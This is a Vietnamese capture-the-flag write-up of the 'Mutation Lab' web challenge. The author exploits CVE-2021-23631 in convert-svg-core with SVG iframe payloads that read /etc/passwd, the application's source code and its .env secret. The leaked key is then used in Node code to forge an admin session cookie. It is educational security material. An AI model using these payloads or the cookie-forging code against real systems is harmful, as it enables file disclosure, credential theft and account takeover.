Đợt vừa rồi, mình có tham gia thi Cyber Apocalypse CTF 2022
, năm ngoái mình cũng tham gia giải Cyber Apocalypse CTF 2021
có viết writeup xịn xò Cyber Apocalypse 202 1 Writeup, chủ yếu mình tham gia giải mấy bài web là chính.
Năm nay tham gia thì cũng mục đích vào xem đề web hay có hay không, chứ không có ý định đi sâu, thì đâu đó ngồi hơn một buổi sáng thì clear được mấy bài như hình dưới:
Những bài web đã giải được.
Lý do mình không làm thêm là, dạo này đang bận rất nhiều việc với lại team của mình cũng bận chả ai tham gia, mình ham hố vào giải web thôi.
Ok, lý do thế đủ rồi, giờ vào nội dung chính bài nay nè. Chỉ vì lỗi Improper Error Handling cũng có thể khiến ứng dụng web bị hack như thế nào?
Đề bài
Bài web này có tên là Mutation Lab
Địa chỉ web: http://134.209.20.90:31789
, đây là một bài blackbox vì không được cung cấp source code.
Truy cập vào địa chỉ http://134.209.20.90:31789/
chúng ta được một page như bên dưới nha.
Cấu hình và Phân tích website này một chút
Cấu hình Burpsuite
Để làm bài này mình cấu hình target scope cho Burpsuite rồi làm tiếp nhé. Nếu các bạn chưa biết Burpsuite thì có thể tự tìm hiểu ở đây nhé.
Dạo vòng quanh và phân tích
Khi truy cập vào địa chỉ được cũng cấp, thì ứng dụng hiển thị ra 1 page có chức năng login và register.
Trước tiên chưa có tài khoản nên mình cứ thử register trước xem sao nhé. Thử đăng ký một tài khoản có tên 0xmanhnv
Đăng ký thành công! và đăng nhập với tài khoản vừa đăng ký thì được một trang đầy rẫy trung tình
và 1 hình ảnh giống miếng thịt bò
(Thực ra là hình ảnh tế bào) như thế này:
Mình tiếp tục dạo 1 vòng các chức năng có trên ứng dụng này, thì mình tổng hợp được một số chức năng như sau:
Reset Experimentation
→ Chức năng này là reset lại trạng thái của miếngthịt bò
kia và mấy contrung tình
về 1 trạng thái random, không có sự tương tác với server.Export Cell Structure
→ ? Chưa biết chức năng này dùng làm gì và sẽ tìm hiểu ở phần sau.Export TadPole Samples
→ ? Chưa biết chức năng này dùng làm gì và sẽ tìm hiểu ở phần sau.Logout
→ chức năng này không cần quan tâm
Giờ là lúc tìm hiểu 2 chức năng Export Cell Structure
và Export TadPole Samples
làm những gì.
Khi bấm vào Export TadPole Samples
, ứng dụng sẽ xử lý một cái gì đó và đưa mình đến đến 1 link ảnh http://134.209.20.90:31789/exports/c212e64c11dadcfc4f23986a47f2b84b.png
. Hình ảnh này có mấy con trung tình
ở trạng thái giống với lúc mình bấm nút Export TadPole Samples
.Mình đoán là ảnh này là chụp lại trạng thái mấy con trung tình
ở thời điểm bấm nút và được export thành ảnh png.
Tiếp theo thử bấm nút Export Cell Structure
, thì cũng tương tự như trên nhưng lần này là miếng thịt bò
đã được export ra thành ảnh png.
Vậy là mình đã hiểu sơ qua về cách hoạt động của ứng dụng trên UI, giờ mình thử chuyển qua Burpsuite kiểm tra thử xem, thực sự thì 2 chức năng này nó tương tác với server như thế nào?
Khi vào Burpsuite, mình thấy Burpsuite đã bắt được 7 requests, trong đó
/
là lúc mình đi đến đường dẫnhttp://134.209.20.90:31789/
/api/register
là lúc bấm nút đăng ký/api/login
là lúc bấm nút login/api/dashboard
khi login thành công, được chuyển hướng sang dashboard- 2 requests
/api/export
trả về kết quả thành công → Mình đoán là do tôi bấm vàoExport Cell Structure
vàExport TadPole Samples
- 1 requests
/api/export
trả về kết quảError
⇒ Mình cho nó là đáng nghi ngờ, và chắc chắn cần phải kiểm tra.
Mình tiến hành xem qua 3 request /api/export
.
- Với 2 requests thành công, thì thấy dữ liệu gửi lên là dữ liệu là
json
cókey
làsvg
vớivalue
lànội dung của ảnh SVG
.
Sau khi request được gửi thành công, dữ liệu được trả về là 1 đường dẫn tới ảnh png /exports/17cd2093d6247f486094b36d6e39bec4.png
so sánh kết quả của cả 2 request thì chính là đường dẫn của 2 ảnh được export ra bên trên.
Đến đây mình lại đoán hoặc kết luận luôn trong suy nghĩ của mình cũng được là: Khi bấm vào nút Export Cell Structure
hoặc Export TadPole Samples
, Client sẽ chụp lại trạng thái của bầy trung tình
hoặc miếng thịt bò
tương ứng bằng svg
sau đó gửi dữ liệu svg
đó lên server để server export
ra ảnh png
và trả về đường dẫn cho client hiển thị lên.
Ok, vậy requests thành công thì là như thế, nhưng request bị lỗi thì sao nhỉ?
Tiếp tục xem nội dung request lỗi thì thấy trong dữ liệu json gửi lên, value của svg
là null
Xem response lỗi được trả về:
<!DOCTYPEhtml><htmllang="en"><head><metacharset="utf-8"><title>Error</title></head><body><pre>TypeError: Cannot read properties of null (reading 'indexOf')<br> at Converter.[convert] (/app/node_modules/convert-svg-core/src/Converter.js:191:25)<br> at Converter.convert (/app/node_modules/convert-svg-core/src/Converter.js:114:40)<br> at API.convert (/app/node_modules/convert-svg-core/src/API.js:80:32)<br> at /app/routes/index.js:61:21<br> at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)<br> at next (/app/node_modules/express/lib/router/route.js:144:13)<br> at Route.dispatch (/app/node_modules/express/lib/router/route.js:114:3)<br> at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)<br> at /app/node_modules/express/lib/router/index.js:286:22<br> at Function.process_params (/app/node_modules/express/lib/router/index.js:348:12)</pre></body></html>
Mình lại đoán tiếp (Vì khi mà không biết chắc chắn thì cứ đoán): Khi Client gửi nội dung svg
với giá trị null
, ứng dụng không xử lý được và gây ra lỗi nhưng lỗi này không được xử lý trước khi trả về, mà trả thẳng lỗi của runtime của ứng dụng về cho Client, và vô tình ta biết được một số thông tin của ứng dụng.
Trong lỗi trả về này, tôi có được một số thông tin có thể hữu ích như sau
/app/routes/index.js
→ Nơi chứa source code route của ứng dụng này, từ đây có thể suy đoán ra được folder/app
chính là nơi chứasource code
của ứng dụng.TypeError: Cannot read properties of null (reading 'indexOf')<br> at Converter.[convert] (/app/node_modules/convert-svg-core/src/Converter.js:191:25)
→ lỗi không thể xử lý vớiproperties null
xảy ra trong/app/node_modules/convert-svg-core/src/Converter.js
→ vậy là ứng dụng có sử dụng module có tên làconvert-svg-core
Tìm lỗ hổng
Sau khi đi qua các chức năng, và hiểu sơ qua về ứng dụng, đây là lúc đi tìm lỗ hổng. Hiện tại chức năng nghi ngờ nhất, và khiến mình muốn tập trung nhất là chức năng export với API /api/export
Sao lại như vậy? Vì:
- Có sự tương tác với server.
- Dữ liệu sai (Ví dụ ở đây là null) thì server trả về lỗi, vậy là lỗi không được thực hiện tiền xử lý. → Unstrusted data
Ở phần trên, tôi đã biết ứng dụng sử dụng convert-svg-core
, trước hết mình target vào module này bằng cách đi tìm xem nó có tồn tại vuln nào tồn tại trong module này không?
Search google thì ra rất nhiều kết quả là CVE-2021-23631
lỗ hổng Directory Traversal rất mới, năm 2021, được 7.5 điểm
, lỗ hổng mức high
. Thử tìm hiểu về CVE này xem nhé.
https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-1582785
Đọc qua về CVE thì mình có thể biết được payload trong phần ví dụ của CVE.
<svg-dummy></svg-dummy><iframesrc="**file:///etc/passwd**"width="100%"height="1000px"></iframe><svgviewBox="0 0 240 80"height="1000"width="1000"xmlns="http://www.w3.org/2000/svg"><textx="0"y="0"class="Rrrrr"id="demo">data</text></svg>
Hiểu sơ qua thì payload này sử dụng thẻ iframe
chèn vào nội dung svg
, và iframe
sẽ load file:///path/to/file
, trong ví dụ là load file /etc/passwd
Trước tiên, tôi thử với payload có được, để xem nó có chạy không?
Nhưng trước khi chạy chúng ta cần làm một số thao tác để chuẩn hóa lại payload, vì data request lên server là ở dạng json
{"svg":"payload"}
Nên những dấu "
trong payload cần đưa về '
hoặc "
để không bị escape
ra khỏi json, tôi thực hiện một số thao tác magic như bên dưới.
Replace "
thành "
Kết quả replace "
thành "
Tiếp theo tôi cần phải đưa payload thành 1 dòng, bằng cách bỏ đi n
Sau khi thực hiện các bước trên, payload có được sẽ là:
<svg-dummy></svg-dummy><iframe src="**file:///etc/passwd**" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"> <text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>
Tôi thử gửi dữ liệu với payload lên server, bằng chức năng repeater của Burpsuite.
Kết quả của request thành công và được 1 đường dẫn ảnh png, thử truy cập vào.
Ok, thành công. Tôi đã có thể đọc được nội dung /etc/passwd
của server.
Leak source code ứng dụng.
Bây giờ tôi thử đọc source code của ứng dụng.
Trước tiên là file /app/index.js
<svg-dummy></svg-dummy><iframe src="file://**/app/index.js**" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"> <text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>
Kết quả thành công và nội dung source code của file /app/index.js
Phần trên tôi đã biết là có /app/routes/index.js
, vậy tôi đọc tiếp source code của nó.
<svg-dummy></svg-dummy><iframe src="file://**/app/routes/index.js**" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"> <text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>
Kết quả thành công và nội dung source code của file /app/routes/index.js
Vậy là đã đọc được source của index
và routes
của ứng dụng, hình ảnh tuy bị giới hạn độ dài không đọc được hết nội dung 1 file, tuy nhiên hiện tại như thế này là đủ.
Sau khi đọc source của 2 file giờ đây mình có thêm một số thông tin như sau:
-
/app/.env
→ Thường là nơi chưa file cấu hìnhenvironment
của ứng dụng. -
Ứng dụng sử dụng
SESSION_SECRET_KEY
trong process.env (được load từ/app/.env
) để tạo session. -
Để có thể đọc được flag thì
session.username
phải làadmin
Tôi đi giải quyết từng cái một nhé.
/app/.env
→ Nơi chưa file cấu hìnhenvironment
của ứng dụng
Tối đọc thử nó xem như thế nào.
<svg-dummy></svg-dummy><iframe src="file://**/app/.env**" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"> <text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>
Kết quả thành công và tôi đã có SESSION_SECRET_KEY
Ở đây vì thông tin trả về là ảnh, không copy được thì có thể dùng Iphone hoặc download ảnh về dùng mấy tools tách chữ từ ảnh mà đọc nhé, ở đây mình dùng camera điện thoại để đọc và copy text ra.
SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db
Nhắc lại một chút:
- Ứng dụng sử dụng
SESSION_SECRET_KEY
để tạosession
- Để có thể đọc được
flag
thìsession.username
phải làadmin
Tôi thực hiện code 1 đoạn nodejs express
để tái hiện lại cách tạo session
bằng SESSION_SECRET_KEY
vừa lấy được như sau:
const express =require('express');const session =require('cookie-session');const cookieParser =require('cookie-parser');const{ response }=require('express');const app =express();
app.use(express.json({limit:'2mb'}));
app.use(cookieParser());
app.use(session({
name:'session',
keys:['5921719c3037662e94250307ec5ed1db'],}))
app.get('/',(req, res)=>{
req.session.username ='admin';
res.send(req.session);});
app.listen(3000,()=>{
console.log('Server running on port 3000');});
Chạy đoạn code trên và truy cập đến địa chỉ [http://127.0.0.1:3000](http://127.0.0.1:3000)
.
Tôi có được được
session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Bây giờ dùng thông tin session
và seesion.sig
có được gửi request đến /dashboard
.
Kết quả thành công, mình đã có flag nè.
HTB{fr4m3d_th3_s3cr37s_f0rg3d_th3_entrY}
Tại thời điểm giải bài này có 53 flag được submit tính cả mình.
Kết luận
Qua bài này các bạn cũng có thể nhận thấy một điều là chỉ một sai sót không xử lý lỗi trước khi trả về + tin tưởng dữ liệu từ client gửi lên cũng khiến cho một ứng dụng web bị hack như thế nào.
Cảm ơn các bạn đã dành thời gian đọc bài.
Còn mấy bài còn lại rất hay, nhưng dạo này có vẻ bận, nếu như có thời gian mình sẽ writeup hết sau nhé.
Nguồn: viblo.asia